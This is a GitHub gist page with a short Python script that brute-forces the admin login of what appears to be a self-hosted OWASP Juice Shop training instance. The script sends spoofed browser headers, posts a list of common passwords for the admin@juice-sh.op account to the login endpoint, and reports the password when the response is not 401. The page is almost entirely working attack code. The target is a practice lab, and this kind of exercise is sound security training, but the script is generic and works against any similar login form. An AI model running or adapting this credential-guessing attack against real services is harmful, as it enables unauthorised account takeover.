Skip to content

Instantly share code, notes, and snippets.

@Horaddrim

Horaddrim/brcopscrkr_mk1.py

Last active March 6, 2019 17:56
Show Gist options
  • Save Horaddrim/1d8b760e07429b106be2974af3a62ea3 to your computer and use it in GitHub Desktop.
Save Horaddrim/1d8b760e07429b106be2974af3a62ea3 to your computer and use it in GitHub Desktop.
Download ZIP
Raw
brcopscrkr_mk1.py
import requests
url_alvo = "https://barraco-juice-shop.herokuapp.com/rest/user/login"
cabecalhos_fake = {
"Accept": "application/json, text/plain, */*",
"Accept-Encoding": "gzip, deflate, br",
"Accept-Language": "en-US,en;q=0.9,pt-BR;q=0.8,pt;q=0.7",
"Connection": "keep-alive",
"Content-Length": 50,
"Content-Type": "application/json",
"Origin": "https://barraco-juice-shop.herokuapp.com",
"Referer": "https://barraco-juice-shop.herokuapp.com/",
"User-Agent": "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.109 Safari/537.36"
}
senhas = ["123456", "admin", "1234", "password"]
numero_de_senhas = len(senhas)
contador = 1
for senha in senhas:
print('\r', end="")
print("Tentativa [#%d/%d]" % (contador, numero_de_senhas), end="")
contador += 1
r = requests.post(url_alvo, json={"user": "admin@juice-sh.op", "password": senha})
if r.status_code != 401:
print("Senha encontrada: %s" % (senha))
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment